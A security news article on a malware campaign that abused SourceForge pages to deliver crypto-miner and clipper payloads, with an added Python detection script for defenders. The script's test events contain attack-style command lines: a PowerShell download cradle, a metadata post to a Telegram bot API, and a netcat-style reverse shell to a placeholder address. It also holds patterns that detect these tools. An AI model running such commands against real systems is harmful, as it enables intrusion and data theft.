Cryptocurrency Miner and Clipper Malware spreads through SourceForge Cracked Software List

April 8, 2025

Threat actors have been observed distributing malicious payloads such as cryptocurrency miner and clipper malware through the popular software hosting service SourceForge, posing as cracked versions of legitimate applications like Microsoft Office.

“One such project, officepackage, on the main website sourceforge.net, looks harmless enough, containing Microsoft Office add-ins copied from a legitimate GitHub project,” Kaspersky said in a report published today. “The description and contents of officepackage provided below were also taken from GitHub.”

Every project created on sourceforge.net is assigned a “<project>.sourceforge.io” domain name, but the Russian cybersecurity company found that the domain for officepackage, “officepackage.sourceforge[.]io,” displays a long list of Microsoft Office applications with corresponding download links, in Russian.

Moreover, hovering over the download button reveals a seemingly legitimate URL in the browser status bar, “loading.sourceforge[.]io/download,” which gives the impression that the download is associated with SourceForge. Clicking the link, however, redirects the user to a completely different page hosted on “taplink[.]cc” that prominently displays another download button.

Should the victim click that download button, they are served a 7 MB ZIP archive (“vinstaller.zip”). It contains a second, password-protected archive (“installer.zip”) and a text file holding the password needed to open it.


Inside the new ZIP file is an MSI installer that drops several files: a console archive utility called “UnRAR.exe,” a RAR archive, and a Visual Basic (VB) script.

“The VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub,” Kaspersky said. “This file contains the password for the RAR archive. It also unpacks the malicious files and runs the next-stage script.”

The batch file is designed to run two PowerShell scripts. One sends system metadata using the Telegram API; the other downloads a further batch script that acts on the contents of the RAR archive and ultimately launches the miner and clipper malware (aka ClipBanker) payloads.

Also dropped is a Netcat executable renamed “ShellExperienceHost.exe” (the name of a legitimate Windows shell component) that establishes an encrypted connection with a remote server. That is not all: the confvk batch file has been found to create another file named “ErrorHandler.cmd” containing a PowerShell script programmed to retrieve and execute text strings via the Telegram API.
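The chain described above leaves a recognisable trail in process-creation telemetry: a script host launching a downloading PowerShell, a command line carrying a Telegram Bot API URL, an archiver given its password on the command line, and a binary named like a Windows component running from a user-writable folder. The following is an added example for this article, not Kaspersky's code. It runs a few such rules over constructed records in the shape a parsed Sysmon Event ID 1 feed would give and correlates them per host; the hostnames, paths, GitHub repository, Telegram token and 198.51.100.7 address are all made up, and the rule names and two-rule correlation threshold are the author's assumptions.

```python
"""Triage of process-creation telemetry for the officepackage infection chain.

Added example for this article, not Kaspersky's code. The records below are
constructed (hostnames, paths, the GitHub repo, the Telegram bot token and the
198.51.100.7 address are all made up); the rule names and the two-rule
correlation threshold are the author's assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent: str    # parent image file name (as Sysmon Event ID 1 reports it)
    image: str     # full path of the new process
    cmdline: str


# Script hosts that should rarely launch a downloading PowerShell on a workstation.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}

DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|\bcurl\b|\bwget\b|start-bitstransfer)", re.I)
# Telegram Bot API URLs embed the bot token: api.telegram.org/bot<id>:<secret>/...
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+", re.I)
# UnRAR/RAR/7-Zip given a password on the command line (-p- means "no password").
ARCHIVE_PASSWORD = re.compile(r"\s-p(?!-)\S+", re.I)
# Netcat-style "-e <shell>" argument, as used to hand the attacker a shell.
NETCAT_EXEC = re.compile(r"\s-e\s+\S*(cmd|powershell)", re.I)
# Where the real ShellExperienceHost.exe lives (assumption: default Windows layout).
SYSTEMAPPS = "c:\\windows\\systemapps\\"


def evaluate(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event trips (empty list if none)."""
    image = ev.image.lower()
    name = image.rsplit("\\", 1)[-1]
    hits = []
    if (name == "powershell.exe" and ev.parent.lower() in SCRIPT_HOSTS
            and DOWNLOAD_CRADLE.search(ev.cmdline)):
        hits.append("script-host-spawns-powershell-downloader")
    if TELEGRAM_BOT_API.search(ev.cmdline):
        hits.append("telegram-bot-api-in-cmdline")
    if name in {"unrar.exe", "rar.exe", "7z.exe"} and ARCHIVE_PASSWORD.search(ev.cmdline):
        hits.append("password-protected-archive-extraction")
    if name == "shellexperiencehost.exe" and not image.startswith(SYSTEMAPPS):
        hits.append("shellexperiencehost-outside-systemapps")
    if NETCAT_EXEC.search(ev.cmdline):
        hits.append("netcat-style-exec-argument")
    return hits


def triage(events) -> dict[str, list[str]]:
    """Map each host that tripped at least one rule to its sorted distinct rule names."""
    per_host: dict[str, set[str]] = {}
    for ev in events:
        names = evaluate(ev)
        if names:
            per_host.setdefault(ev.host, set()).update(names)
    return {h: sorted(n) for h, n in per_host.items()}


def chain_hosts(events, min_rules: int = 2) -> list[str]:
    """Hosts where several distinct stages fired: one hit is noise, two or more is a chain."""
    return sorted(h for h, n in triage(events).items() if len(n) >= min_rules)


# Constructed telemetry: ws-a follows the chain in the article, ws-b is benign.
EVENTS = [
    ProcEvent("ws-a", "wscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -c "iwr https://raw.githubusercontent.com/example-user/example-repo/main/confvk -OutFile $env:TEMP\confvk.bat"'),
    ProcEvent("ws-a", "cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -ep bypass -c "Invoke-RestMethod -Uri https://api.telegram.org/bot123456789:AAExampleTokenNotReal/sendMessage -Method Post -Body $meta"'),
    ProcEvent("ws-a", "cmd.exe", r"C:\Users\victim\AppData\Local\Temp\unrar.exe",
              r"unrar.exe x -pQwerty123 -y installer.rar ."),
    ProcEvent("ws-a", "cmd.exe", r"C:\Users\victim\AppData\Local\Temp\ShellExperienceHost.exe",
              r"ShellExperienceHost.exe 198.51.100.7 443 -e cmd.exe"),
    ProcEvent("ws-b", "explorer.exe",
              r"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe",
              r"ShellExperienceHost.exe -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca"),
    ProcEvent("ws-b", "explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -c "iwr https://example.org/tool.zip -OutFile tool.zip"'),
]

if __name__ == "__main__":
    for host, rules in triage(EVENTS).items():
        print(host, rules)
    print("chain candidates:", chain_hosts(EVENTS))
```

The parent-process gate on the PowerShell rule is deliberate: a user typing `iwr` in a console spawned by Explorer is routine, a download cradle launched by wscript.exe from a freshly extracted archive is not. Correlating distinct stages per host, rather than alerting on any single match, keeps the legitimate ShellExperienceHost.exe and ordinary scripted downloads on ws-b out of the alert queue.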

The fact that the website has a Russian interface indicates a focus on Russian-speaking users. Telemetry data shows that 90% of potential victims are in Russia, with 4,604 users encountering the scheme between early January and late March.

With the sourceforge[.]io pages indexed by search engines and appearing in search results, it is believed that Russian users searching for Microsoft Office on Yandex are the target.

“As users seek ways to download applications outside official sources, attackers offer their own,” Kaspersky said. “While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, attackers could sell system access to more dangerous actors.”

The disclosure comes as Kaspersky also detailed a campaign that distributes a malware downloader called TookPS through rogue sites impersonating the DeepSeek artificial intelligence (AI) chatbot, as well as remote desktop and 3D modeling software.

These include websites such as deepseek-ai-soft[.]com, to which unsuspecting users are redirected via sponsored Google search results.


TookPS is designed to download and run PowerShell scripts that grant remote access to the infected host over SSH, and to drop a modified version of the TeviRat trojan. This highlights the threat actors' efforts to gain full access to victims' computers in a variety of ways.

“The sample [...] uses DLL sideloading to modify and deploy the TeamViewer remote access software onto infected devices,” Kaspersky said. “Simply put, attackers place a malicious library in the same folder as TeamViewer.”

The development follows the discovery of malicious Google Ads for the popular VMware utility RVTools that served a tampered version of ThunderShell (aka SMOKEDHAM), a PowerShell-based remote access tool (RAT).

“ThunderShell, sometimes referred to as SMOKEDHAM, is a publicly available post-exploitation framework designed for red teaming and penetration testing,” Field Effect said. “It provides a command-and-control (C2) environment that allows operators to execute commands on compromised machines via PowerShell-based agents.”
